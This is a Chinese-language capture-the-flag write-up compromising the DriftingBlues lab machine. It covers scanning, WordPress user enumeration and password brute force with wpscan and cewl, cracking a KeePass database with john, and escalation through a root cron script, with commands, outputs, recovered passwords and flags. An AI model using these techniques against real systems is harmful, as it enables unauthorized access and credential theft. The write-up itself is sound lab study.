信息搜集
主机扫描
arp-scan -l
端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.254.43
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-29 04:14 EDT
Nmap scan report for 192.168.254.43
Host is up (0.00045s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
MAC Address: 08:00:27:CA:4D:E5 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
路径扫描
┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 100 -b 403,404 -x php,txt,jpg,html,txt,zip -u http://192.168.254.43
===============================================================
/wp-content (Status: 301) [Size: 321] [--> http://192.168.254.43/wp-content/]
/index.php (Status: 301) [Size: 0] [--> http://192.168.254.43/]
/wp-login.php (Status: 200) [Size: 6675]
/license.txt (Status: 200) [Size: 19915]
/wp-includes (Status: 301) [Size: 322] [--> http://192.168.254.43/wp-includes/]
/readme.html (Status: 200) [Size: 7278]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-admin (Status: 301) [Size: 319] [--> http://192.168.254.43/wp-admin/]
/xmlrpc.php (Status: 405) [Size: 42]
/wp-signup.php (Status: 302) [Size: 0] [--> http://192.168.254.43/wp-login.php?action=register]
Progress: 1245858 / 1245864 (100.00%)
发现登录界面,且发现是wordpress页面,于是有两个思路
- 利用sql注入
- 利用wpscan漏洞扫描
结果是发现利用wpscan扫描用户
获取shell
WPScan使用方法 – 吃不胖的ruanruan – 博客园 (cnblogs.com)
利用wpscan可以扫描用户名,然后利用cewl生成字典,爆破密码
wpscan --url http://192.168.254.43 --enumerate u
[i] User(s) Identified:
[+] abuzerkomurcu
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.254.43/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] gadd
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] gill
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] collins
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] satanic
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
生成字典
┌──(root㉿kali)-[~/blue5]
└─# cewl -d 2 -m 4 -w passwd --with-numbers http://192.168.254.43/
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
之后再进行爆破用户名,可以利用wpscan
┌──(root㉿kali)-[~/blue5]
└─# wpscan --url http://192.168.254.43 --usernames user.txt --passwords passwd
[!] Valid Combinations Found:
| Username: gill, Password: interchangeable
成功发现用户名和密码
在媒体页面发现一个图片,下载分析,发现ssh登录密码
直接ssh登录,获得user.txt
ssh gill@ip
gill@driftingblues:~$ cat user.txt
F83FC7429857283616AE62F8B64143E6
提权
接着我们发现在gill目录下,有一个秘钥文件/keyfile.kdbx,搜索发现需要用到工具去解决
keepass2john keyfile.kdbx > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Press 'q' or Ctrl-C to abort, almost any other key for status
porsiempre (keyfile)
keepass2 keyfile.kdbx
输入密码,发现秘钥名和秘钥
到这没什么思路,于是通过老方法一个一个试
- sudo -l 无法使用
- find / -perm -u=s -type f 2>/dev/null 也没有发现什么可以利用的命令
- 定时文件也没有什么可以利用的
- /usr/sbin/getcap -r 2>/dev/null 也没有什么可以利用的
- find / -writable 2>/dev/null 没有什么可以写的文件
没法子了,通过师傅的wp才发现,把我兄弟linpeas.sh和pspy64给忘了,哈哈哈哈哈
通过linpeas.sh,发现一个可以的秘钥文件
╔══════════╣ Unexpected in root
/vmlinuz.old
/initrd.img
/initrd.img.old
/vmlinuz
/keyfolder
通过pspy64发现一个定时文件,秘钥的文件定时执行,很好玩,但并不知道这个秘钥脚本是干什么的,这就很头疼,通过师傅的wp,猜测是将秘钥名写入秘钥文件中,也就是/keyfolder中
2024/05/29 07:04:49 CMD: UID=0 PID=1 | /sbin/init
2024/05/29 07:05:01 CMD: UID=0 PID=13750 | /usr/sbin/CRON -f
2024/05/29 07:05:01 CMD: UID=0 PID=13751 | /usr/sbin/CRON -f
2024/05/29 07:05:01 CMD: UID=0 PID=13752 | /bin/sh -c /root/key.sh
2024/05/29 07:05:01 CMD: UID=0 PID=13753 | /bin/bash /root/key.sh
2024/05/29 07:05:49 CMD: UID=0 PID=13754 |
2024/05/29 07:06:01 CMD: UID=0 PID=13755 | /usr/sbin/CRON -f
2024/05/29 07:06:01 CMD: UID=0 PID=13756 | /usr/sbin/CRON -f
2024/05/29 07:06:01 CMD: UID=0 PID=13757 | /bin/sh -c /root/key.sh
2024/05/29 07:06:01 CMD: UID=0 PID=13758 | /bin/bash /root/key.sh
通过师傅的wp发现需要先写入秘钥文件名,并且需要一个一个写,也就是需要一个一个名字试,不能一次性全部写入keyfloder中,这样才能执行成功
touch fracturedocean
gill@driftingblues:/keyfolder$ ls -la
total 12
drwx---rwx 2 root root 4096 May 29 08:01 .
drwxr-xr-x 19 root root 4096 Feb 24 2021 ..
-rw-r--r-- 1 gill gill 0 May 29 07:57 fracturedocean
-rw-r--r-- 1 root root 29 May 29 08:01 rootcreds.txt
gill@driftingblues:/keyfolder$ cat rootcreds.txt
root creds
imjustdrifting31
获得root
root@driftingblues:~# cat root.txt
9EFF53317826250071574B4D4EE56840
我们在分析key.sh文件
root@driftingblues:~# cat key.sh
#!/bin/bash
if [[ $(ls /keyfolder) == "fracturedocean" ]]; then
echo "root creds" >> /keyfolder/rootcreds.txt
echo "" >> /keyfolder/rootcreds.txt
echo "imjustdrifting31" >> /keyfolder/rootcreds.txt
fi
意思就是/keyflode文件中如果含有fracturedocean这个文件,就会将root的密码输入到rootcreds文件里,也就是root的秘钥文件中,很有意思的一个脚本,这种提权方式还真是第一次见
知识点
- cewl搜集信息
- wpscan的使用
- 通过猜测脚本内容来提权